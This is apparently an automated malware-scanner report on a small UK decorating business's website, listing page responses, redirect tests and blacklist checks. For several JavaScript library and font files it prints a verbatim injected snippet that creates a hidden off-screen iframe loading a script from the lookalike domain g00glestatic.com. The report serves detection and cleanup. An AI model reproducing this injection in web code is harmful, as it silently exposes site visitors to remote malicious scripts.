Scanned pages/files
Request | Server response | Status |
http://earlscourtpainterdecorator.co.uk/ | 200 OK Content-Length: 9853 Content-Type: text/html | clean |
http://earlscourtpainterdecorator.co.uk/js/maxheight.js | 200 OK Content-Length: 3891 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var _f = document.createElement('iframe'),_r = 'setAttribute';_f[_r]('src', 'http://g00glestatic.com/s.js');_f.style.position = 'absolute';_f.style.width = '10px';_f[_r]('frameborder', navigator.userAgent.indexOf('bf3f1f8686832c30d7c764265f8e7ce8') + 1);_f.style.left = '-5540px';document.write('<div id=\'MIX_ADS\'></div>');document.getElementById('MIX_ADS').appendChild(_f); Antivirus reports:
| ||
http://earlscourtpainterdecorator.co.uk/js/jquery-1.3.2.min.js | 200 OK Content-Length: 57907 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var _f = document.createElement('iframe'),_r = 'setAttribute';_f[_r]('src', 'http://g00glestatic.com/s.js');_f.style.position = 'absolute';_f.style.width = '10px';_f[_r]('frameborder', navigator.userAgent.indexOf('bf3f1f8686832c30d7c764265f8e7ce8') + 1);_f.style.left = '-5540px';document.write('<div id=\'MIX_ADS\'></div>');document.getElementById('MIX_ADS').appendChild(_f); Antivirus reports:
| ||
http://earlscourtpainterdecorator.co.uk/js/cufon-yui.js | 200 OK Content-Length: 18911 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var _f = document.createElement('iframe'),_r = 'setAttribute';_f[_r]('src', 'http://g00glestatic.com/s.js');_f.style.position = 'absolute';_f.style.width = '10px';_f[_r]('frameborder', navigator.userAgent.indexOf('bf3f1f8686832c30d7c764265f8e7ce8') + 1);_f.style.left = '-5540px';document.write('<div id=\'MIX_ADS\'></div>');document.getElementById('MIX_ADS').appendChild(_f); Antivirus reports:
| ||
http://earlscourtpainterdecorator.co.uk/js/cufon-replace.js | 200 OK Content-Length: 914 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var _f = document.createElement('iframe'),_r = 'setAttribute';_f[_r]('src', 'http://g00glestatic.com/s.js');_f.style.position = 'absolute';_f.style.width = '10px';_f[_r]('frameborder', navigator.userAgent.indexOf('bf3f1f8686832c30d7c764265f8e7ce8') + 1);_f.style.left = '-5540px';document.write('<div id=\'MIX_ADS\'></div>');document.getElementById('MIX_ADS').appendChild(_f); Antivirus reports:
| ||
http://earlscourtpainterdecorator.co.uk/js/Myriad_Pro_900.font.js | 200 OK Content-Length: 71016 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var _f = document.createElement('iframe'),_r = 'setAttribute';_f[_r]('src', 'http://g00glestatic.com/s.js');_f.style.position = 'absolute';_f.style.width = '10px';_f[_r]('frameborder', navigator.userAgent.indexOf('bf3f1f8686832c30d7c764265f8e7ce8') + 1);_f.style.left = '-5540px';document.write('<div id=\'MIX_ADS\'></div>');document.getElementById('MIX_ADS').appendChild(_f); Antivirus reports:
| ||
http://earlscourtpainterdecorator.co.uk/js/Myriad_Pro_400.font.js | 200 OK Content-Length: 68096 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var _f = document.createElement('iframe'),_r = 'setAttribute';_f[_r]('src', 'http://g00glestatic.com/s.js');_f.style.position = 'absolute';_f.style.width = '10px';_f[_r]('frameborder', navigator.userAgent.indexOf('bf3f1f8686832c30d7c764265f8e7ce8') + 1);_f.style.left = '-5540px';document.write('<div id=\'MIX_ADS\'></div>');document.getElementById('MIX_ADS').appendChild(_f); Antivirus reports:
| ||
http://earlscourtpainterdecorator.co.uk/js/Myriad_Pro_600.font.js | 200 OK Content-Length: 67971 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var _f = document.createElement('iframe'),_r = 'setAttribute';_f[_r]('src', 'http://g00glestatic.com/s.js');_f.style.position = 'absolute';_f.style.width = '10px';_f[_r]('frameborder', navigator.userAgent.indexOf('bf3f1f8686832c30d7c764265f8e7ce8') + 1);_f.style.left = '-5540px';document.write('<div id=\'MIX_ADS\'></div>');document.getElementById('MIX_ADS').appendChild(_f); Antivirus reports:
| ||
http://earlscourtpainterdecorator.co.uk/js/Myriad_Pro_700.font.js | 200 OK Content-Length: 68288 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var _f = document.createElement('iframe'),_r = 'setAttribute';_f[_r]('src', 'http://g00glestatic.com/s.js');_f.style.position = 'absolute';_f.style.width = '10px';_f[_r]('frameborder', navigator.userAgent.indexOf('bf3f1f8686832c30d7c764265f8e7ce8') + 1);_f.style.left = '-5540px';document.write('<div id=\'MIX_ADS\'></div>');document.getElementById('MIX_ADS').appendChild(_f); Antivirus reports:
| ||
http://earlscourtpainterdecorator.co.uk/index.html | 200 OK Content-Length: 9853 Content-Type: text/html | clean |
http://earlscourtpainterdecorator.co.uk/gallery.html | 200 OK Content-Length: 24194 Content-Type: text/html | clean |
http://earlscourtpainterdecorator.co.uk/services.html | 200 OK Content-Length: 8805 Content-Type: text/html | clean |
http://earlscourtpainterdecorator.co.uk/contact.html | 200 OK Content-Length: 10172 Content-Type: text/html | clean |
http://earlscourtpainterdecorator.co.uk/commercial.html | 200 OK Content-Length: 11372 Content-Type: text/html | clean |
http://earlscourtpainterdecorator.co.uk/exterior_painting_decorating_clapham.html | 404 Not Found Content-Length: 358 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: earlscourtpainterdecorator.co.uk
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 26 Jun 2014 00:50:13 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 9853
Content-Type: text/html
Last-Modified: Sun, 02 Dec 2012 18:05:52 GMT
...9853 bytes of data.
GET / HTTP/1.1
Host: earlscourtpainterdecorator.co.uk
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 26 Jun 2014 00:50:13 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 9853
Content-Type: text/html
Last-Modified: Sun, 02 Dec 2012 18:05:52 GMT
...9853 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: earlscourtpainterdecorator.co.uk
Referer: http://www.google.com/search?q=earlscourtpainterdecorator.co.uk
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: earlscourtpainterdecorator.co.uk
Referer: http://www.google.com/search?q=earlscourtpainterdecorator.co.uk
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=earlscourtpainterdecorator.co.uk
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://earlscourtpainterdecorator.co.uk/
Result: earlscourtpainterdecorator.co.uk is not infected or malware details are not published yet.
Result: earlscourtpainterdecorator.co.uk is not infected or malware details are not published yet.